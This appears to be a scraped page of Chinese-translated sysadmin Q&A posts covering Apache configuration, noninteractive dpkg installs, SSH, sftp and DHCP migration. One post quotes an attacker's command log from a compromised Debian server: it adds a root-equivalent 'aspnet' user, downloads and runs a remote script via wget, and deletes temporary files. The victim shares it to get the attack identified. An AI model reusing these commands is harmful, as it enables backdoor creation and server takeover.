我一直在尝试遵循一些基本教程来解释如何启动和运行 Apache(在 ubuntu 上,在亚马逊上运行)。我大部分时间都是空白的,因为所有的教程都告诉我配置 httpd.conf(添加 DocumentRoot 等)。
我现在偶然发现了一个教程,它告诉我将站点配置添加到站点可用目录(在 /etc/apache 下),然后从启用站点的符号链接到它。以这种方式配置似乎有效。
但现在我很困惑 - 我应该如何配置 Apache?大多数教程似乎仍然说我应该使用 httpd.conf。我应该使用哪一种?有什么不同?为什么所有的教程都是“错误的”(如果是)?
我正在尝试安装一堆 .deb 文件而无需与它们交互。例如,MySQL 服务器将提示交互式菜单,以根据 dpkg 的配置输入管理密码。
我试过了。
export DEBIAN_FRONTEND=noninteractive && export DEBIAN_PRIORITY=critical && sudo /usr/bin/dpkg -i ./files/*
Run Code Online (Sandbox Code Playgroud)
我知道我可以在没有配置的情况下提取文件。我正在尝试创建一个 bash 脚本来部署一个预先配置了 Apache、php、mySQL 等默认安装的服务器。但是,这种“交互式安装”导致了问题。
关于如何禁用它的任何想法?或解决方法?
谢谢
是否有任何实用程序可以限制进程启动后的网络吞吐量?简单示例:您注意到用户使用 scp 占用了您所有的上传带宽,并且您想限制速率或降低传输的优先级。
我想我可以使用 iptables/tc 或 pf 的组合来实现这一点,但我想知道是否有可用的“一次性”工具(例如带有 --pid 选项的涓流 ^^)?
我一直在做关于保护 linux web 服务器的“广泛”研究。除了所谓的“基础”(删除未使用的服务、强化 ssh、iptables 等)之外,包括反 rootkits (Tripwire) 和反病毒 (ClamAV) 是否明智?这些对于网络服务器来说是否太过分了?我知道这是一个非常模糊的问题,但我很好奇其他人的意见。
我未来的环境: - ubuntu 10.04 - fail2ban - nginx 0.8.x - php 5.3.x (suhosin, apc, memcached) - mongodb 1.6.x
可能的应用: - 网络服务 - 用户上传的网络应用程序(图片、pdf 等) - 典型网站(表格等)
如果您有任何其他提示,请随时添加!
谢谢
我正在调整 ubuntu 云版本默认设置,其中拒绝 root 登录。
尝试连接到这样的机器会产生:
maxim@maxim-desktop:~/workspace/integration/deployengine$ ssh root@ec2-204-236-252-95.compute-1.amazonaws.com
The authenticity of host 'ec2-204-236-252-95.compute-1.amazonaws.com (204.236.252.95)' can't be established.
RSA key fingerprint is 3f:96:f4:b3:b9:4b:4f:21:5f:00:38:2a:bb:41:19:1a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'ec2-204-236-252-95.compute-1.amazonaws.com' (RSA) to the list of known hosts.
Please login as the ubuntu user rather than root user.
Connection to ec2-204-236-252-95.compute-1.amazonaws.com closed.
Run Code Online (Sandbox Code Playgroud)
我想知道在哪个配置文件中配置了通过 ssh 阻止根目录以及如何更改打印的消息?
如果我想在通过 LAN 连接的两台计算机之间传输大文件,通过网络(设置为千兆以太网)是否比在计算机之间使用直接 Firewire 800 连接更快?如果 Firewire 800 快得多,我可以用 Firewire 800 设置多台计算机的局域网吗?
performance performance-monitoring gigabit-ethernet firewire
我可能刚刚检测到我的服务器上的用户已经植根了我的服务器,但这不是我要问的。
有没有人见过这样的命令:
echo _EoT_0.249348813417008_;
id;
echo _EoT_0.12781402577841_;
echo $PATH && a=`env |grep PATH | awk -F '=' '{print $2":/usr/sbin"}'` && export PATH=$a && echo $PATH;
echo _EoT_0.247556708344121_;
whereis useradd;
echo _EoT_0.905792585668774_;
useradd -p saZlzoRm9L4Og -o -g 0 -u 0 aspnet;
echo _EoT_0.369123892063307_;
wget http://178.xxx.xxx.181/suhosin14.sh;
echo _EoT_0.845361576801043_;
chmod +x suhosin14.sh && ./suhosin14.sh && sleep 5 && ls -la && locate index.php;
echo _EoT_0.161914402299161_;
rm -rf /tmp/ZyCjBiU;
echo _EoT_0.751816968837201_;
Run Code Online (Sandbox Code Playgroud)
在我看来,这是一些自动化脚本的工作,但我不确定是哪一个。
任何人都有这方面的线索?
操作系统是 Debian Lenny,内核 2.6.30-bpo.2-686-bigmem(如果这很重要)。
顺便说一下,上面代码中的链接被屏蔽了,任何想要下载代码的人,我都复制了一份供分析,所以我可以根据要求提供。
编辑:如果有人感兴趣,我正在附上 .sh 脚本的内容作为参考。
#!/bin/sh
PHP=`which php` …
Run Code Online (Sandbox Code Playgroud) 我正在尝试设置 sftp 服务器,但客户端收到错误,Connection closed by server with exitcode 1
/var/log/auth.log (如下)没有多大帮助,我怎样才能找出错误是什么?
我正在运行 Ubuntu 10.04.1 LTS
sshd[27236]: Accepted password for theuser from (my ip) port 13547 ssh2
sshd[27236]: pam_unix(sshd:session): session opened for user theuser by (uid=0)
sshd[27300]: subsystem request for sftp
sshd[27236]: pam_unix(sshd:session): session closed for user theuser
Run Code Online (Sandbox Code Playgroud)
更新:我已经提示这一点有一段时间了,我在另一台服务器上收到 sftp 命令,给了我一个更有用的错误。
Request for subsystem 'sftp' failed on channel 0
Couldn't read packet: Connection reset by peer
Run Code Online (Sandbox Code Playgroud)
我在网上找到的所有内容都表明这个 id 是 sftp-server 的问题,但是当我从 sshd 配置中删除 chroot 时,我可以访问系统。我认为这意味着 sftp-server 可以访问并且设置正确。
我需要将 dhcp 服务器从 linux 迁移/转换到活动目录。它目前在 sles9 盒子上运行良好。
定义了 136 个子网和大约 1200 个固定地址预留。如果现有的 dhcpd.conf 可以编写脚本就好了...
我说所有本机 Windows 复制功能(即命令行和 GUI)通过读取 WAN 上的数据然后将其写回,在同一远程服务器上执行从一个文件夹到另一个文件夹的复制是否正确。因此,复制速度由 WAN 速度定义。
是否有任何实用程序可用于以某种方式使复制在远程服务器上执行而无需通过 WAN?
我对 Netware 中的 NCOPY 的记忆非常模糊,正在做这样的事情,即复制是由服务器执行的。
Windows 是否存在类似的东西?